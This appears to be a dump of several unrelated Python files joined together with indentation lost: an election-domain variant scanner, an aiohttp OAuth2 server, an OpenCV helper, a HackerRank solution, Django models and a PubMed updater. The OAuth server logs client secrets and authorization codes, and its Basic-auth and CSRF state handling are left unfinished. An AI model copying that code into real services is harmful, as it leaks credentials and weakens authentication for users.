state.append( stringAndStrip( aState.upper( ) ) )
statenick = list( nd.get( aState.upper() ) )
for s1 in statenick:
for s in s1:
state.append( s )
mName = ""
middleInitial = ""
if (args.middleName) :
mName = args.middleName
mName = mName.lower()
middleInitial = mName[0]
# This assigns the position variable
if (electionType == 'congress') or (electionType == 'congressional') :
position = 'congress'
altPosition = 'congressman' # congresswoman??
elif electionType == 'senate' :
position = 'senator'
altPosition = 'senate'
elif (electionType == 'governor') or (electionType == 'gubernatorial'):
position = 'governor'
altPosition = 'gov'
elif (electionType == 'president') or (electionType == 'presidential') :
position = 'president'
altPosition = 'prez'
elif (electionType == 'mayoral') or (electionType == 'mayor') :
position = 'mayor'
altPosition = 'mayoral'
else :
position = electionType
altPosition = electionType
# top-level domain-names
# # consider removing .me, .info, and .biz if they aren't adding value
# Runs stringAndStrip on everything except fileName b/c that's used elsewhere
fName = stringAndStrip(fName)
lName = stringAndStrip(lName)
year = stringAndStrip(year)
electionType = stringAndStrip(electionType)
# Alerting the users to the types of sites we're expecting to find
# This differs at times since the state variable isn't mandatory to run the script
## Consider deleting this - does it actually provide value?
if (args.state) :
print('We expect to find these URLs excluding subtle variances:')
print('http://www.' + fName + lName + '.com')
print('http://www.' + lName + fName + '.com')
print('http://www.' + fName + year + '.com')
print('http://www.' + lName + year + '.com')
print('http://www.' + fName + lName + year + '.com' )
for stateAlias in state:
print('http://www.' + fName + lName + 'for' + stateAlias + '.com')
print('http://www.' + lName + 'for' + stateAlias + '.com')
print('http://www.' + fName + 'for' + stateAlias + '.com')
print('http://www.' + fName + lName + 'for' + position + '.com')
print('http://www.' + fName + 'for' + position + '.com')
print('http://www.' + fName + 'for' + position + year + '.com')
print('http://www.' + position + fName + lName + '.com')
else :
print('We expect to find these URLs excluding subtle variances:')
print('http://www.' + fName + lName + '.com')
print('http://www.' + lName + fName + '.com')
print('http://www.' + fName + year + '.com')
print('http://www.' + lName + year + '.com')
print('http://www.' + fName + lName + year + '.com' )
print('http://www.' + fName + lName + 'for' + position + '.com')
print('http://www.' + fName + 'for' + position + '.com')
print('http://www.' + fName + 'for' + position + year + '.com')
print('http://www.' + position + fName + lName + '.com')
# This is the result output files
# Makes a unique filename based on data and time
now = date.today()
partyString = ""
if ( args.party ) :
partyString = "-" + party.lower()
tempResults = 'results-' + fName + '-' + lName + '-' + stateText + partyString + '-' + str(now) + '.txt'
resultsFile = open(tempResults, "w")
# This clears the results files before reopening them
resultsFile.close()
resultsFile = open(tempResults, "a")
## Other alphabets are defined as a quick way of doing URL mangling.
## Is this a candidate for deletion?
# alternative alphabets
# 0: No change
# 1: i -> 1 "Eye to One"
# 2: l -> i "El to Eye"
# 3: i -> l "Eye to El"
# 4: o -> 0 "Oh to Zero"
# 5: 0 -> o "Zero to Oh"
# 6: n -> m "En to Em" TODO: Does this swap wrok right?
# 7: m -> n "Em to En"
# 8: e -> 3 "Ee to three"
# 9: 3 -> e "Three to ee"
# These are the template that we'll use based on the optional input parameters.
# The first one is if the state was input.
templates = generate_urls(first_name=args.firstName,
last_name=args.lastName,
state=state,
middlename=args.middleName,
position=position,
altPosition=altPosition,
year=args.year)
# This generates the text mangling
results = genAll(templates, alt_alphabets)
# This generates the text mangling with some other alternatives
resultsDonate = genAllDonate(templates, alt_alphabets)
#### LOOP 1 ####
# All examples use the input of 'josh franklin 2014 president DC'
#################
#http://www.joshfranklin.com
#http://www.josh2014.com
#http://www.franklin2014.com
#http://www.joshfranklin2014.com
#http://www.joshfranklinforDC.com
#http://www.joshfranklinDC.com
#http://www.joshforpresident.com
#http://www.josh4president.com
#http://www.joshforpresident2014.com
#http://www.josh4president2014.com
#http://www.presidentjoshfranklin.com
#http://www.president-josh-franklin.com
#http://www.presidentjoshforpresident2014.com
#http://www.presidentjosh4president2014.com
#http://www.presidentjoshfranklinforpresident2014.com
#http://www.presidentjosh-franklinforpresident2014.com
#http://www.presidentjoshfranklin4president2014.com
#http://www.presidentjosh-franklin4president2014.com
def tryURL(url):
url = stringAndStrip(url)
for domain_name in tlds:
print('Trying: ' + url + domain_name)
allURLS.append(url + domain_name)
print("Entering template loop 1^^^^^^^^^^^^^^^^^^^^^^^^^^" )
print(time.time() - start_time, "seconds")
for r in results:
tryURL( 'http://www.' + r , )
### LOOP 2 ###
# Puts donate at the beginning &
# Removes the period after 'www'
##############tlds a little
tlds.append( '.republican' )
tlds.append( '.democrat' )
tlds.append( '.red' )
tlds.append( '.blue' )
tlds.append( '.vote' )
#These next few look for some of the larger parties
tryURL( 'http://www.republican' + fName + lName )
tryURL( 'http://www.democrat' + fName + lName )
tryURL( 'http://www.libertarian' + fName + lName )
tryURL( 'http://www.independent' + fName + lName )
tryURL( 'http://www.vote' + fName + lName ) #Example: votejoshfranklin.com
tryURL( 'http://www.vote' + fName + middleInitial + lName ) #Example: votejoshmichaelfranklin.com
tryURL( 'http://www.vote' + fName ) #Example: votejosh.com
tryURL( 'http://www.vote' + lName ) #Example: votefranklin.com
tryURL( 'http://www.' + lName + position ) #Example: franklinpresident.com
tryURL( 'http://www.' + lName + altPosition ) #Example: franklinprez.com
tryURL( 'http://www.real' + fName + lName ) #Example: realjoshfranklin.com
for stateAlias in state:
tryURL( 'http://www.' + lName + 'for' + stateAlias ) #Example: franklinforDC.com
tryURL( 'http://www.' + lName + '4' + stateAlias ) #Example: franklin4DC.com
tryURL( 'http://www.friendsof' + fName ) #Example: friendsofjosh.com
tryURL( 'http://www.friendsof' + lName ) #Example: friendsofjosh.com
tryURL( 'http://www.' + fName + 'sucks' ) #Example: joshsucks.com
tryURL( 'http://www.' + lName + 'sucks' ) #Example: franklinsucks.com
tryURL( 'http://www.' + fName ) #Example: josh.vote
tryURL( 'http://www.' + lName ) #Example: franklin.vote
tryURL( 'http://www.' + fName + lName ) #Example: joshfranklin.vote
tryURL( 'http://www.elect' + fName + lName )
tryURL( 'http://www.elect' + fName + middleInitial + lName )
tryURL( 'http://www.elect' + fName )
tryURL( 'http://www.elect' + lName )
tryURL( 'http://www.' + fName + middleInitial + year )
tryURL( 'http://www.' + middleInitial + lName )
print( ' Total URLS: ' + str(len(allURLS)) + "\n" )
allURLS = removeDups( allURLS )
print( 'Unique URLS: ' + str(len(allURLS)) + "\n" )
pool = ThreadPool( 24 )
# Open the urls in their own threads
# and return the results
results = pool.map( tryURLforReal, allURLS )
pool.close()
pool.join()
#print(results)
# Each thread added an entry for each result (found or not, gotta filter the blanks)
# I'm doing this here sinced the file writes might not have been synchronized
# its just a fear I had
for i in results:
resultsFile.write( i )
totalRuntime = time.time() - start_time, "seconds"
###### Write final results to logfile ###########
resultsFile.write( "######################################" + "\n" )
resultsFile.write( "ElectionBuster Scan Results: " + "\n" )
resultsFile.write( "######################################" + "\n" )
resultsFile.write( "INPUTS = " + str(fName) + ", " + str(mName) + ", " + str(lName) + ", " + str(year) + ", " + str(position) + ", " + str(altPosition) + ", " + str(stateText) + ", " + str(party) + "\n" )
resultsFile.write( "Total runtime was " + str(totalRuntime) + "\n" )
resultsFile.write( "There were " + str(len(confirmedURLs)) + " positive results." + "\n" )
resultsFile.write( "There were " + str(len(testedURLs)) + " unique URLs tested." + "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
resultsFile.write( "Positive results: " + "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
for url in confirmedURLs:
resultsFile.write( str(url) + "\n" )
resultsFile.write( "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
resultsFile.write( "EOF " + "\n" )
#for url in allURLS:
# resultsFile.write( str(url) + "\n" )
# print( str( url ) + "\n" )
###### Print final results to screen ###########
print( "###################################### " + "\n" )
print( "ElectionBuster Scan Results: " + "\n" )
print( "###################################### " + "\n" )
print( "INPUTS" + "\n" )
print( "First name: " + fName + "\n" )
print( "Middle name: " + mName + "\n" )
print( "Last name: " + lName + "\n" )
print( "Year: " + year + "\n" )
print( "Election type: " + electionType + "\n" )
print( "-------------------------------------" + "\n" )
print( "Total runtime was " + str(totalRuntime) + "\n" )
print( "-------------------------------------" + "\n" )
print( "Positive results: " + "\n" )
print( "There were " + str(len(confirmedURLs)) + " hits:" + "\n" )
print( "-------------------------------------" + "\n" )
print( "\n" )
for url in confirmedURLs:
print( url )
print( "\n" )
# Bad things happen if these files are not properly closed
resultsFile.close()
| 13,338 | 4,694 |
"""Initialization of authentication."""
import json
import logging
import secrets
import uuid
from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
from core.core import ApplicationCore
import aiohttp_jinja2
from aiohttp import hdrs, web
from ..const import CONF_TOKEN_LIFETIME
from .auth_client import AuthenticationClient
from .auth_database import AuthDatabase
_LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class Authentication:
# list of registered auth clients
auth_clients: List[AuthenticationClient] = []
def __init__(
self,
core: "ApplicationCore",
application: web.Application,
auth_database: AuthDatabase,
):
self.core = core
self.app = application
self.authorization = self.core.authorization
self.auth_database = auth_database
# Authorization Endpoint: obtain an authorization grant
self.app.router.add_get(
path="/oauth/authorize", handler=self.authorization_endpoint_get
)
self.app.router.add_post(
path="/oauth/authorize", handler=self.authorization_endpoint_post
)
# Token Endpoint: obtain an access token by authorization grant or refresh token
self.app.router.add_post(
path="/oauth/token", handler=self.token_endpoint_handler
)
self.app.router.add_post("/revoke", self.revoke_token_handler, name="revoke")
self.app.router.add_get("/protected", self.protected_handler, name="protected")
def add_client(self, auth_client: AuthenticationClient):
self.auth_clients.append(auth_client)
async def revoke_token_handler(self, request: web.Request) -> web.StreamResponse:
"""
Revoke the request token and all associated access tokens [RFC 7009]
See Section 2.1: https://tools.ietf.org/html/rfc7009#section-2.1
"""
_LOGGER.info("POST /revoke")
await self.check_authorized(request)
data = await request.post()
token_to_revoke = data["token"]
await self.auth_database.revoke_token(token_to_revoke)
return web.Response(status=200)
async def protected_handler(self, request: web.Request) -> web.StreamResponse:
_LOGGER.warning("GET /protected")
await self.check_permission(request, "library:read")
response = web.Response(body=b"You are on protected page")
return response
@aiohttp_jinja2.template("authorize.jinja2")
async def authorization_endpoint_get(
self, request: web.Request
) -> web.StreamResponse:
"""
Validate the request to ensure that all required parameters are present and valid.
See Section 4.1.1: https://tools.ietf.org/html/rfc6749#section-4.1.1
"""
try:
_LOGGER.debug(f"GET /oauth/authorize from: {request.host}")
response_type = request.query.get("response_type")
client_id = request.query.get("client_id")
# validate required params
if response_type is None or client_id is None:
_LOGGER.warning("The response is missing a response_type or client_id.")
data = """{
"error": "invalid_request",
"error_description": "The request is missing a required parameter"
}"""
return web.json_response(json.loads(data))
# check if client is known
if not any(client.client_id == client_id for client in self.auth_clients):
_LOGGER.warning("The client_id is unknown!")
data = """{
"error":"unauthorized_client",
"error_description":"The client is not authorized to request an authorization code using this method."
}"""
return web.json_response(json.loads(data))
# validate response_type
if response_type != "code":
_LOGGER.warning(
f"The request is using an invalid response_type: {response_type}"
)
data = """{
"error":"unsupported_response_type",
"error_description":"The request is using an invalid response_type"
}"""
return web.json_response(json.loads(data))
redirect_uri = request.query.get("redirect_uri")
# extract client from registered auth_clients with matching client_id
registered_auth_client = next(
filter(lambda client: client.client_id == client_id, self.auth_clients),
None,
)
# validate if redirect_uri is in registered_auth_client
if not any(
uri == redirect_uri for uri in registered_auth_client.redirect_uris
):
_LOGGER.error(f"redirect uri not found: {redirect_uri}")
data = """{
"error":"unauthorized_client",
"error_description":"The redirect_uri is unknown"
}"""
return web.json_response(json.loads(data))
scope = request.query.get("scope")
requested_scopes = scope.split(" ")
# TODO: validate scopes with regex => 1*( %x21 / %x23-5B / %x5D-7E ))
registered_scopes = [
"openid",
"profile",
"email",
"phone",
"library:read",
"library:append",
"library:edit",
"library:write",
"library:share",
"admin.users:read",
"admin.users:invite",
"admin.users:write",
]
_LOGGER.debug(
f"found {len(registered_scopes)} registered scopes and {len(requested_scopes)} requested scopes."
)
# check if the requested scope is registered
for requested_scope in requested_scopes:
if requested_scope not in registered_scopes:
_LOGGER.error(
f"The requested scope '{requested_scope}' is invalid, unknown, or malformed."
)
data = """{
"error":"invalid_scope",
"error_description":"The requested scope is invalid, unknown, or malformed."
}"""
return web.json_response(json.loads(data))
# persist state to preventing cross-site request forgery [Section 10.12](https://tools.ietf.org/html/rfc6749#section-10.12)
# state = request.query.get("state")
# TODO: add scopes & localized descriptions only for requested scopes
return {
"requesting_app": registered_auth_client.client_name,
"permissions": [
{
"scope": "openid",
"localized": "access the users public profile e.g.: username",
},
{
"scope": "profile",
"localized": "access the users personal profile information e.g.: firstname, lastname",
},
{
"scope": "email",
"localized": "access the users associated email address.",
},
{
"scope": "phone",
"localized": "access the users associated phone number.",
},
# {
# "scope": "library.read",
# "localized": "Read only Grant the user to list all photos owned by the user.",
# },
# {
# "scope": "library.append",
# "localized": "Limited write access Grant the user to add new photos, create new albums.",
# },
# {
# "scope": "library.edit",
# "localized": "Grant the user to edit photos owned by the user.",
# },
{
"scope": "library.write",
"localized": "Grant the user to add and edit photos, albums, tags.",
},
# {
# "scope": "library.share",
# "localized": "Grant the user to create new shares (photos/videos/albums).",
# },
# {
# "scope": "admin.users:read",
# "localized": "Grant the user to list users on the system.",
# },
# {
# "scope": "admin.users:invite",
# "localized": "Grant the user to invite new users to the system.",
# },
# {
# "scope": "admin.users:write",
# "localized": "Grant the user to manage users on the system.",
# },
],
}
except Exception as e:
# This error code is needed because a 500 Internal Server
# Error HTTP status code cannot be returned to the client via an HTTP redirect.
_LOGGER.error(f"an unexpected error happened: {e}")
data = """{
"error":"server_error",
"error_description":"The authorization server encountered an unexpected condition that prevented it from fulfilling the request."
}"""
return web.json_response(json.loads(data))
async def authorization_endpoint_post(
self, request: web.Request
) -> web.StreamResponse:
"""
Validate the resource owners credentials.
"""
_LOGGER.debug("POST /oauth/authorize")
data = await request.post()
redirect_uri = request.query["redirect_uri"]
if "client_id" not in request.query:
_LOGGER.warning("invalid form")
raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
client_id = request.query["client_id"]
_LOGGER.debug(f"client_id {client_id}")
state = None
if "state" in request.query:
state = request.query["state"]
_LOGGER.debug(f"state {state}")
# check if client is known
if not any(client.client_id == client_id for client in self.auth_clients):
_LOGGER.warning(f"unknown client_id {client_id}")
if state is not None:
raise web.HTTPFound(
f"{redirect_uri}?error=unauthorized_client&state={state}"
)
else:
raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
# extract client from registered auth_clients with matching client_id
registered_auth_client = next(
filter(lambda client: client.client_id == client_id, self.auth_clients),
None,
)
# validate if redirect_uri is in registered_auth_client
if not any(uri == redirect_uri for uri in registered_auth_client.redirect_uris):
_LOGGER.error(f"invalid redirect_uri {redirect_uri}")
if state is not None:
raise web.HTTPFound(
f"{redirect_uri}?error=unauthorized_client&state={state}"
)
else:
raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
email = data["email"].strip(" ").lower()
password = data["password"]
# validate credentials
credentials_are_valid = await self.auth_database.check_credentials(
email, password
)
if credentials_are_valid:
# create an authorization code
authorization_code = self.auth_database.create_authorization_code(
email, client_id, request.remote
)
_LOGGER.debug(f"authorization_code: {authorization_code}")
if authorization_code is None:
_LOGGER.warning("could not create auth code for client!")
error_reason = "access_denied"
if state is not None:
raise web.HTTPFound(
f"{redirect_uri}?error={error_reason}&state={state}"
)
else:
raise web.HTTPFound(f"{redirect_uri}?error={error_reason}")
if state is not None:
_LOGGER.debug(
f"HTTPFound: {redirect_uri}?code={authorization_code}&state={state}"
)
redirect_response = web.HTTPFound(
f"{redirect_uri}?code={authorization_code}&state={state}"
)
else:
_LOGGER.debug(f"HTTPFound: {redirect_uri}?code={authorization_code}")
redirect_response = web.HTTPFound(
f"{redirect_uri}?code={authorization_code}"
)
raise redirect_response
else:
error_reason = "access_denied"
_LOGGER.warning(f"redirect with error {error_reason}")
if state is not None:
raise web.HTTPFound(
f"{redirect_uri}?error={error_reason}&state={state}"
)
else:
raise web.HTTPFound(f"{redirect_uri}?error={error_reason}")
async def token_endpoint_handler(self, request: web.Request) -> web.StreamResponse:
"""
Access Token: https://tools.ietf.org/html/rfc6749#section-4.1.3
Refresh Token: https://tools.ietf.org/html/rfc6749#section-6
"""
_LOGGER.debug("POST /oauth/token")
data = await request.post()
# grant_type is REQUIRED
if "grant_type" not in data:
_LOGGER.warning("no grant_type specified!")
data = '{"error":"invalid_request"}'
return web.json_response(json.loads(data))
grant_type = data["grant_type"]
# switch flow based on grant_type
if grant_type == "authorization_code":
return await self._handle_authorization_code_request(data)
elif grant_type == "refresh_token":
return await self._handle_refresh_token_request(request, data)
else:
_LOGGER.warning(f"invalid grant_type! {grant_type}")
data = '{"error":"invalid_request"}'
return web.json_response(json.loads(data))
async def _handle_authorization_code_request(self, data) -> web.StreamResponse:
"""
See Section 4.1.3: https://tools.ietf.org/html/rfc6749#section-4.1.3
"""
# grant_type already checked
# code is REQUIRED
if "code" not in data:
_LOGGER.warning("code param not provided!")
data = {"error": "invalid_request"}
return web.json_response(status=400, data=data)
code = data["code"]
# redirect_uri is REQUIRED
if "redirect_uri" not in data:
_LOGGER.warning("redirect_uri param not provided!")
data = {"error": "invalid_request"}
return web.json_response(status=400, data=data)
redirect_uri = data["redirect_uri"]
# TODO: compare redirect_uri with previous call
_LOGGER.debug(f"TODO: compare redirect_uri {redirect_uri}")
# client_id is REQUIRED
if "client_id" not in data:
data = {"error": "invalid_request"}
return web.json_response(status=400, data=data)
client_id = data["client_id"]
client_code_valid = await self.auth_database.validate_authorization_code(
code, client_id
)
if not client_code_valid:
_LOGGER.error("authorization_code invalid!")
payload = {"error": "invalid_grant"}
return web.json_response(status=400, data=payload)
access_token, refresh_token = await self.auth_database.create_tokens(
code, client_id
)
payload = {
"access_token": access_token,
"token_type": "Bearer",
"expires_in": CONF_TOKEN_LIFETIME,
"refresh_token": refresh_token,
}
return web.json_response(status=200, data=payload)
async def _handle_refresh_token_request(
self, request: web.Request, data
) -> web.StreamResponse:
"""
See Section 6: https://tools.ietf.org/html/rfc6749#section-6
"""
# code is REQUIRED
if "refresh_token" not in data:
_LOGGER.warning("refresh token not provided!")
data = {"error": "invalid_request"}
return web.json_response(data)
refresh_token = data["refresh_token"]
# check if client_id and client_secret are provided as request parameters or HTTP Basic auth header
if "client_id" in data and "client_secret" in data:
# handle request parameters
client_id = data["client_id"]
client_secret = data["client_secret"]
elif hdrs.AUTHORIZATION in request.headers:
# handle basic headers
auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(" ", 1)
if auth_type != "Basic":
return False
# TODO: split auth_val in client_id and client_secret
_LOGGER.error(f"split token into client_id and client_secret: {auth_val}")
client_id = ""
client_secret = ""
registered_auth_client = next(
filter(lambda client: client.client_id == client_id, self.auth_clients),
None,
)
_LOGGER.debug(f"client_id: {client_id}, {registered_auth_client}")
if not registered_auth_client.client_secret == client_secret:
_LOGGER.error("client_id does not match with client_secret")
data = {"error": "invalid_client"}
return web.json_response(data)
access_token, refresh_token = await self.auth_database.renew_tokens(
client_id, refresh_token
)
if access_token is None:
raise web.HTTPForbidden()
payload = {
"access_token": access_token,
"token_type": "Bearer",
"expires_in": CONF_TOKEN_LIFETIME,
"refresh_token": refresh_token,
}
return web.json_response(payload)
def create_client(self):
"""Generate a client_id and client_secret to add new clients."""
client_id = uuid.uuid4()
client_secret = secrets.token_urlsafe(16)
_LOGGER.info(f"generated client_id: {client_id}")
_LOGGER.info(f"generated client_secret: {client_secret}")
async def check_authorized(self, request: web.Request) -> Optional[str]:
"""Check if authorization header and returns user ID if valid"""
if hdrs.AUTHORIZATION in request.headers:
try:
auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(
" ", 1
)
if not await self.auth_database.validate_access_token(auth_val):
raise web.HTTPForbidden()
return await self.auth_database.user_id_for_token(auth_val)
except ValueError:
# If no space in authorization header
_LOGGER.debug("invalid authorization header!")
raise web.HTTPForbidden()
else:
_LOGGER.debug("missing authorization header!")
raise web.HTTPForbidden()
async def check_permission(self, request: web.Request, scope: str) -> None:
"""Check if given authorization header is valid and user has granted access to given scope."""
# check if user is authorized
await self.check_authorized(request)
# check if required scope is granted
await self.core.authorization.check_scope(scope)
| 20,227 | 5,338 |
import cv2
def process_background(background, track_options):
""" extract background: first frame of first video of a session
Allow user to specify ROIs on the background image """
print(' ... extracting background')
cv2.startWindowThread()
if len(background.shape) == 3:
gray = cv2.cvtColor(background, cv2.COLOR_BGR2GRAY)
else:
gray = background
blur = cv2.blur(gray, (15, 15))
edges = cv2.Canny(blur, 25, 30)
rois = {'Shelter': None, 'Threat': None, 'Task': None}
if track_options['bg get rois']: # Get user to define Shelter ROI
for rname in rois.keys():
print('\n\nPlease mark {}'.format(rname))
rois[rname] = cv2.selectROI(gray, fromCenter=False)
return edges, rois
| 785 | 263 |
#!/bin/python3
import math
import os
import random
import re
import sys
# This solution times out on Hackerrank with Python 3
# However, it passes all test cases with Pypy 3
def countInversions(arr):
global COUNT_INVERSIONS
COUNT_INVERSIONS = 0
mergeSort(arr)
return COUNT_INVERSIONS
def mergeSort(arr):
if (len(arr) <= 1):
return arr
# Split the array in two
# Recursively sort both halves
middle = len(arr) // 2
arrLeft = mergeSort(arr[:middle])
arrRight = mergeSort(arr[middle:])
# Merge the two halves
mergedArray = []
leftIndex = 0
rightIndex = 0
global COUNT_INVERSIONS
# Iterate through both lists and append the smaller element
while(leftIndex < len(arrLeft) and rightIndex < len(arrRight)):
if(arrLeft[leftIndex] <= arrRight[rightIndex]):
mergedArray.append(arrLeft[leftIndex])
leftIndex += 1
else:
mergedArray.append(arrRight[rightIndex])
rightIndex += 1
COUNT_INVERSIONS += len(arrLeft) - leftIndex
# Append any left over elements
mergedArray.extend(arrLeft[leftIndex:])
mergedArray.extend(arrRight[rightIndex:])
return mergedArray
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
num_test_cases = int(input())
for _test_case in range(num_test_cases):
_ = int(input())
arr = list(map(int, input().rstrip().split()))
result = countInversions(arr)
fptr.write(str(result) + '\n')
fptr.close()
| 1,553 | 488 |
from django.db import models
# Create your models here.
class Post(models.Model):
content = models.TextField()
created_at = models.DateTimeField()
def __str__(self):
return self.content
class Comment(models.Model):
comment = models.CharField(max_length=200)
created_at = models.DateTimeField()
post = models.ForeignKey(Post, on_delete=models.CASCADE)
def __str__(self):
return self.comment | 447 | 131 |
# Generated by Django 3.0.6 on 2020-06-06 12:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('gymkhana', '0005_auto_20200605_0937'),
('gymkhana', '0013_event_info'),
]
operations = [
]
| 267 | 119 |
#!/usr/bin/env python3
# -*- coding: latin-1 -*-
from Bio import Entrez
from Bio import Medline
import argparse
import os
import csv
import logging
import encodedcc
EPILOG = '''
Takes in a VERY specific file format to use for updating the publications
Also can update the existing publications using the pubmed database
An EMAIL is required to run this script
This is for the Entrez database
This is a dryrun default script
This script requires the BioPython module
Options:
%(prog)s --consortium Consortium_file.txt
This takes the consortium file
%(prog)s --community Community_file.txt
This takes the community file
%(prog)s --updateonly list.txt
Takes file with single column of publication UUIDs, checks against PubMed \
to ensure data is correct and will update if needed
'''
logger = logging.getLogger(__name__)
def getArgs():
parser = argparse.ArgumentParser(
description=__doc__, epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--consortium',
help="File with consortium publication information")
parser.add_argument('--community',
help="File with community publication information")
parser.add_argument('--outfile',
help="Output file name", default='publication_results.txt')
parser.add_argument('--key',
help="The keypair identifier from the keyfile.",
default='default')
parser.add_argument('--keyfile',
help="The keyfile",
default=os.path.expanduser('~/keypairs.json'))
parser.add_argument('--debug',
help="Debug prints out HTML requests and returned JSON \
objects. Default is off",
action='store_true',
default=False)
parser.add_argument('--update',
help="Run script and PATCH objects as needed. \
Default is off",
action='store_true',
default=False)
parser.add_argument('--create',
help="Run script and POST new objects as needed. \
Default is off",
action='store_true',
default=False)
parser.add_argument('--createonly',
help="Run script and POST new objects as needed,\
only look up as needed. Default is off",
action='store_true',
default=False)
parser.add_argument('--updateonly',
help="File containing publication UUIDS from ENCODE database for\
updating. If the publication does not have PMID the script will\
find it comparing based on title and assuming unique title")
parser.add_argument('email',
help="Email needed to make queries to Entrez process")
args = parser.parse_args()
if args.debug:
logging.basicConfig(filename=args.outfile, filemode="w",
format='%(levelname)s:%(message)s',
level=logging.DEBUG)
else: # use the default logging level
logging.basicConfig(filename=args.outfile, filemode="w",
format='%(levelname)s:%(message)s',
level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
return args
class PublicationUpdate:
def __init__(self, arguments):
self.MAPPING = {"abstract": "AB", "authors": "AU", "title": "TI",
"volume": "VI", "journal": "JT", "date_published": "DP",
"page": "PG", "issue": "IP"}
self.entrezDict = {}
self.PATCH_COUNT = 0
self.POST_COUNT = 0
args = arguments
self.UPDATE = args.update
self.CREATE = args.create or args.createonly
self.CREATE_ONLY = args.createonly
self.UPDATE_ONLY = args.updateonly
self.community = args.community
self.consortium = args.consortium
if self.UPDATE:
print("Will PATCH publication objects as needed")
if self.CREATE:
print("POST new pubmeds")
def setup_publication(self):
'''consortium publications file'''
self.consortium_dict = {}
with open(self.consortium, 'r', encoding='ISO-8859-1') as f:
reader = csv.reader(f, delimiter='\t')
for PMID, published_by, categories, catch1, code, catch2, title in reader:
categories = categories.replace(";", ",").rstrip(" ")
published_by = published_by.replace(";", ",").rstrip(" ")
cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")]
pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")]
temp = {"published_by": pub, "categories": cat}
self.consortium_dict[PMID] = temp
self.consortium_ids = list(self.consortium_dict.keys())
'''community publications file'''
self.community_dict = {}
with open(self.community, 'r', encoding='ISO-8859-1') as f:
reader = csv.reader(f, delimiter='\t')
for PMID, published_by, categories, data_used, catch1, catch2, title, catch3, catch4, catch5, catch6, catch7, catch8, catch9, catch10, catch11, catch12, catch13, catch14, catch15, catch16, catch17, catch18 in reader:
categories = categories.replace(";", ",").rstrip(" ")
published_by = published_by.replace(";", ",").rstrip(" ")
cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")]
pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")]
temp = {"published_by": pub, "categories": cat, "data_used": data_used}
self.community_dict[PMID] = temp
self.community_ids = list(self.community_dict.keys())
def get_entrez(self, idList):
'''gets the values from Entrez
'''
handle = Entrez.efetch(db="pubmed", id=idList,
rettype="medline", retmode="text")
# records is an iterator, so you can iterate through the records only once
records = Medline.parse(handle)
# save the records, you can convert them to a list
records = list(records)
for record in records:
tempDict = {}
for key in self.MAPPING.keys():
if key == "authors":
auth = ", ".join(str(x) for x in record.get("AU", []))
tempDict["authors"] = auth
else:
tempDict[key] = record.get(self.MAPPING.get(key), "")
self.entrezDict[record.get("PMID")] = tempDict
def check_ENCODE(self, idList, connection, otherIdList=[], bothDicts={}):
for pmid in idList:
extraData = bothDicts.get(pmid)
ENCODEvalue = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=PMID:" + pmid, connection)
if ENCODEvalue.get("@graph"):
log = "PMID " + pmid + " is listed in ENCODE"
logger.info('%s' % log)
uuid = ENCODEvalue.get("@graph")[0].get("uuid")
if not self.CREATE_ONLY:
self.compare_entrez_ENCODE(uuid, pmid, connection, extraData)
else:
if self.CREATE_ONLY:
self.get_entrez([pmid])
titleEntrez = self.entrezDict[pmid].get("title")
found = False
for otherID in otherIdList:
titleENCODE = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=" + otherID, connection)
if titleENCODE.get("title") == titleEntrez:
log = pmid + " is in ENCODE by a different name " + titleENCODE.get("uuid")
logger.warning('%s' % log)
self.compare_entrez_ENCODE(titleENCODE.get("uuid"), pmid, connection, extraData)
if self.UPDATE:
newIdent = titleENCODE.get("identifiers")
newIdent.append("PMID:" + pmid)
patch_dict = {"identifiers": newIdent}
encodedcc.patch_ENCODE(titleENCODE.get("uuid"), connection, patch_dict)
found = True
if found is False:
log = "This publication is not listed in ENCODE " + pmid
logger.warning('%s' % log)
if self.CREATE:
self.POST_COUNT += 1
pmidData = self.entrezDict[pmid]
log = "POSTing the new object: " + pmid
logger.info('%s' % log)
post_dict = {
"title": pmidData.get("title"),
"abstract": pmidData.get("abstract"),
"submitted_by": "/users/8b1f8780-b5d6-4fb7-a5a2-ddcec9054288/",
"lab": "/labs/encode-consortium/",
"award": "/awards/ENCODE/",
"categories": extraData.get("categories"),
"published_by": extraData.get("published_by"),
"date_published": pmidData.get("date_published"),
"authors": pmidData.get("authors"),
"identifiers": ["PMID:" + pmid],
"journal": pmidData.get("journal"),
"volume": pmidData.get("volume"),
"issue": pmidData.get("issue"),
"page": pmidData.get("page"),
"status": "published"
}
if extraData.get("data_used"):
post_dict["data_used"] = extraData.get("data_used")
encodedcc.new_ENCODE(connection, "publications", post_dict)
def compare_entrez_ENCODE(self, uuid, pmid, connection, extraData={}):
'''compares value in ENCODE database to results from Entrez
'''
encode = encodedcc.get_ENCODE(uuid, connection)
entrez = self.entrezDict.get(pmid)
patch = False
if not entrez:
log = "PMID " + pmid + " was not found in Entrez database!!"
logger.warning('%s' % log)
else:
log = "PMID " + pmid
logger.info('%s' % log)
for key in entrez.keys():
if key in encode.keys():
if entrez[key] == encode[key]:
log = "entrez key \"" + key + "\" matches encode key"
logger.info('%s' % log)
else:
log = "\"" + key + "\" value in encode database does not match value in entrez database"
logger.warning('%s' % log)
log = "\tENTREZ: " + entrez[key] + "\n\tENCODE: " + encode[key]
logger.warning('%s' % log)
if self.UPDATE or self.UPDATE_ONLY:
log = "PATCH in the new value for \"" + key + "\""
logger.info('%s' % log)
patch_dict = {key: entrez[key]}
